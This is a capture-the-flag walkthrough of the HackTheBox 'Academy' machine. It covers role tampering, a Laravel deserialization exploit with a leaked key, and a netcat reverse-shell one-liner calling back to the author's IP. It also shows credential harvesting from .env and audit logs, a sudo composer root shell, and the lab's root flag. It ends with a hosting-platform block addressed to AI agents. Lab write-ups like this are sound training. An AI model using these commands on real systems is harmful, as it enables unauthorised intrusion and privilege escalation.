# Academy Academy is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/297), created by egre55 and mrb3n. In the current post, my IP is 10.10.14.44, and the target IP is 10.129.167.56 This machine features an apache server hosting a PHP website. The website doesn't look special until you intercept the registration process, where you can change a obvious parameter to change your privileges to that account, then when you fuzz the website, you find an admin login url. In that URL there is an sub-domain with error logs from Laravel, revealing in the process the API\_KEY used for an exploit for RCE. Inside the machine, there are a lot of techniques used to pivot between users and the change your user to root. ### Recon The first steps are about getting basic information about the target, by using nmap and searching information from the website. {% code title="Local Terminal" %} ```bash $ ping -c 1 10.129.167.56 Pinging 10.129.167.56 with 32 bytes of data: Reply from 10.129.167.56: bytes=32 time=141ms TTL=63 Reply from 10.129.167.56: bytes=32 time=173ms TTL=63 Reply from 10.129.167.56: bytes=32 time=142ms TTL=63 Reply from 10.129.167.56: bytes=32 time=144ms TTL=63 Ping statistics for 10.129.167.56: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 141ms, Maximum = 173ms, Average = 150ms ``` {% endcode %} By the TTL, we can assume that is a Linux Machine. {% code title="Local Terminal" %} ```bash $ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.167.56 -oN Ports Nmap scan report for 10.129.167.56 Host is up, received reset ttl 63 (0.16s latency). Scanned at 2023-06-06 10:37:16 Pacific SA Standard Time for 16s Not shown: 65283 closed tcp ports (reset), 249 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 33060/tcp open mysqlx syn-ack ttl 63 Read data files from: C:\Program Files (x86)\Nmap Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds Raw packets sent: 76803 (3.379MB) | Rcvd: 74737 (2.990MB) ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ nmap -sCV -p 22,80,33060 10.129.167.56 -oN Target Nmap scan report for 10.129.167.56 Host is up (0.15s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA) | 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA) |_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to http://academy.htb/ 33060/tcp open mysqlx? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port33060-TCP:V=7.92%I=7%D=6/6%Time=647F44D8%P=i686-pc-windows-windows% SF:r(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 176.95 seconds ``` {% endcode %} If you search for "OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 launchpad", you can find the specific machine type, in this case the result was: "Ubuntu Focal". It could be useful to find an vulnerability for a certain version. Information that we have now: It's a website (port 80) that use Apache/2.4.41, with an open **mysqlx** (port 33060), there is no response for now. Because of the following message "Did not follow redirect to " we have to [add the IP to /etc/hosts/](https://robertos-notebook.gitbook.io/cybersecurity/cybersecurity/tip-and-tricks/add-host) {% code title="Local Terminal" %} ```bash $ whatweb http://academy.htb http://academy.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.167.56], Title[Hack The Box Academy] ``` {% endcode %} * Browser: If you go to Login, the URL is "", this is a good opportunity to fuzz with php termination. {% code title="Local Terminal" %} ```bash wfuzz -c -f PHPfuzz -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://academy.htb/FUZZ.php ``` {% endcode %} ```javascript ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://academy.htb/FUZZ.php Total requests: 220546 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000001: 200 76 L 131 W 2117 Ch "index" 000000039: 200 141 L 226 W 2627 Ch "login" 000000245: 200 141 L 227 W 2633 Ch "admin" 000000024: 302 1049 L 4114 W 55034 Ch "home" 000000051: 200 148 L 247 W 3003 Ch "register" 000001476: 200 0 L 0 W 0 Ch "config" 000045226: 403 9 L 28 W 276 Ch "http://academy.htb/.php" ``` * Index.php: Nothing * login.php: useful after registration. * admin.php: Admin login panel, it could be useful. * home.php: Redirect to login.php * register.php: Registration form. * config.php: 403, Empty Our alternatives now is to intercept the registration panel with burpsuite. ![](https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FMoMU2zLR3nj4447zL9UM%2Fimage.png?alt=media\&token=fd94bd1b-4e41-4377-b7b5-b653c86a709f)

Interception result

### Exploitation At the response, we can see that between the parameters, there is a "roleid", before we found an admin.php. So, our best action is to change the roleid to 1 and create a new account.

Send this

Then, go to and login with the new user... after this, you will see the following thing:
Hey! There is a subdomain, add it to /etc/hosts. *
### Reverse Shell \[www-data] The website shows a Laravel error, maybe it could be vulnerable to something, search it at exploit-db.com. I tried the [CVE-2021-3129](https://www.exploit-db.com/exploits/49424) but it doesn't work. And the [CVE-2018-15133](https://www.exploit-db.com/exploits/47129) requieres metasploit, but there are alternatives at github. {% embed url="" %} {% code title="Local Terminal" %} ```bash git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133 ``` {% endcode %} The structure of the command is the following: ``` pwn_laravel.py [-h] [-c COMMAND] [-m {1,2,3,4}] [-i] URL API_KEY ```

API_key location

{% code title="Local Terminal" %} ```bash python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive ``` {% endcode %} Now, open a new local terminal {% code title="Local Terminal B" %} ```bash nc -nlvp 443 ``` {% endcode %} {% code title="CVE Interactive Terminal" %} ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 443 >/tmp/f ``` {% endcode %} And you are in! Close the **CVE Interactive Terminal** and do a [**Bash Upgrade** ](https://robertos-notebook.gitbook.io/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade)at the other terminal ### User Pivoting \[cry0l1t3] {% code title="Target Terminal \[www-data]" %} ```bash www-data@academy:/var/www/html$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@academy:/var/www/html$ ls -la total 20 drwxr-xr-x 4 root root 4096 Aug 13 2020 . drwxr-xr-x 3 root root 4096 Aug 7 2020 .. drwxr-xr-x 12 www-data www-data 4096 Aug 13 2020 academy drwxr-xr-x 12 root root 4096 Aug 13 2020 htb-academy-dev-01 -rw-r--r-- 1 www-data www-data 50 Aug 9 2020 index.php # We are at -dev-, is a good idea to check the current working files at academy www-data@academy:/var/www/html$ cd academy/ www-data@academy:/var/www/html/academy$ ls -la total 280 drwxr-xr-x 12 www-data www-data 4096 Aug 13 2020 . drwxr-xr-x 4 root root 4096 Aug 13 2020 .. -rw-r--r-- 1 www-data www-data 706 Aug 13 2020 .env -rw-r--r-- 1 www-data www-data 651 Feb 7 2018 .env.example -rw-r--r-- 1 www-data www-data 111 Feb 7 2018 .gitattributes -rw-r--r-- 1 www-data www-data 155 Feb 7 2018 .gitignore drwxr-xr-x 6 www-data www-data 4096 Feb 7 2018 app -rwxr-xr-x 1 www-data www-data 1686 Feb 7 2018 artisan <...> ``` {% endcode %} There is an interesting hidden file called .env, type **cat .env** {% code title="Target Terminal \[www-data]" %} ```bash AAPP_NAME=Laravel APP_ENV=local APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= APP_DEBUG=false APP_URL=http://localhost LOG_CHANNEL=stack DB_CONNECTION=mysql DB_HOST=127.0.0.1 DB_PORT=3306 DB_DATABASE=academy DB_USERNAME=dev DB_PASSWORD=mySup3rP4s5w0rd!! #Password! BROADCAST_DRIVER=log CACHE_DRIVER=file SESSION_DRIVER=file SESSION_LIFETIME=120 QUEUE_DRIVER=sync REDIS_HOST=127.0.0.1 REDIS_PASSWORD=null REDIS_PORT=6379 MAIL_DRIVER=smtp MAIL_HOST=smtp.mailtrap.io MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null PUSHER_APP_ID= PUSHER_APP_KEY= PUSHER_APP_SECRET= PUSHER_APP_CLUSTER=mt1 MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}" MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}" ``` {% endcode %} Now we can test that password with other users, we can enumerate them at /home {% code title=" Target Terminal \[www-data]" %} ```python www-data@academy:/home$ ls -l total 32 drwxr-xr-x 2 21y4d 21y4d 4096 Aug 10 2020 21y4d drwxr-xr-x 2 ch4p ch4p 4096 Aug 10 2020 ch4p drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12 2020 cry0l1t3 drwxr-xr-x 3 egre55 egre55 4096 Aug 10 2020 egre55 drwxr-xr-x 2 g0blin g0blin 4096 Aug 10 2020 g0blin drwxr-xr-x 5 mrb3n mrb3n 4096 Aug 12 2020 mrb3n ``` {% endcode %} After testing with each { $user : mySup3rP4s5w0rd!! } the correct one is cry0l1t3 {% code title="Target Terminal \[www-data]" %} ```bash $ su cry0l1t3 $ cat /home/cry0l1t3/user.txt ``` {% endcode %} ### User Pivoting \[mrb3n] {% code title="Target Terminal \[cry0l1t3]" %} ```bash $ id uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm) ``` {% endcode %} The user is from the group **adm**, maybe we can use an specific command or read some logs. {% code title="Target Terminal \[cry0l1t3]" %} ```bash $ cd / $ find \-group adm 2>/dev/null <...> ./var/log/apt/term.log.3.gz ./var/log/apt/term.log.1.gz ./var/log/apt/term.log.4.gz ./var/log/apt/term.log ./var/log/audit ./var/log/audit/audit.log.2 ./var/log/audit/audit.log ./var/log/audit/audit.log.3 ./var/log/audit/audit.log.1 ./var/log/syslog.4.gz ./var/log/syslog.7.gz ./var/log/auth.log.2.gz ./var/log/auth.log.1 ./var/log/syslog.3.gz <...> ``` {% endcode %} Usually the logs located at /var/log/audit/ are important, but they have a LOT of information, a good alternative is to use "grep" to find relevant data. {% code title=" Target Terminal \[cry0l1t3]" %} ```bash $ cd /var/log/audit/ # Remember that our current uid is 1002, so we need another one. $ grep -r "uid=1001" | grep "cmd" audit.log:type=USER_CMD msg=audit(1612880564.224:115): pid=1336 uid=1001 auid=1001 ses=1 msg='cwd="/home/mrb3n" cmd=636F6D706F736572202D2D776F726B696E672D6469723D2F746D702F746D702E6F4A4833443269514D322072756E2D7363726970742078 terminal=tty1 res=success' audit.log:type=USER_CMD msg=audit(1612880564.412:119): pid=1353 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=7375646F202D4B terminal=tty1 res=success' audit.log:type=USER_CMD msg=audit(1612880607.016:128): pid=1788 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=2F7573722F62696E2F656469746F72202D2D202F terminal=tty1 res=success' <...> # From here, we want: # 2F7573722F62696E2F656469746F72202D2D202F # Between "cmd=" and "terminal= ``` {% endcode %} From here, we want a hash like "2F7573722F62696E2F656469746F72202D2D202F" between **cmd=** and **Terminal=,** to apply **xxd -ps -r** {% code title="Target Terminal \[cry0l1t3]" %} ```bash grep -r "uid=1001" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -r ``` {% endcode %} Nothing here, now we will tesst with uid=1000 {% code title="Target Terminal \[cry0l1t3]" %} ```bash grep -r "uid=1000" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -r ``` {% endcode %} But there is another interesting rows, the ones that contain "TYPE=tty" and "data=" {% code title="Target Terminal \[cry0l1t3]" %} ```bash grep -r tty | grep -oP '(?<=data=).*' | sort -u | xxd -ps -r ; echo ``` {% endcode %} ```bash exithistory mrb3n_Ac@d3my! su mrb3n whoami cat dat <...> ``` {% code title=" Target Terminal \[cry0l1t3]" %} ```bash su mrb3n # Password: mrb3n_Ac@d3my! ``` {% endcode %} ### Privileges Escalation {% code title="Target Terminal \[mrb3n]" %} ```bash $ id uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n) $ sudo -l [sudo] password for mrb3n: Matching Defaults entries for mrb3n on academy: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User mrb3n may run the following commands on academy: (ALL) /usr/bin/composer ``` {% endcode %} At GTFOBin there is a way to escalate privileges with sudo using composer {% embed url="" %} {% code title="Target Terminal \[mrb3n]" %} ```bash TF=$(mktemp -d) echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json sudo composer --working-dir=$TF run-script x ``` {% endcode %} {% code title="Target Terminal \[root]" %} ```bash $ whoami root $ cat /root/root.txt e13da1f49d8d784bffa5504154a3d8f8 ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/easy-machine/academy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.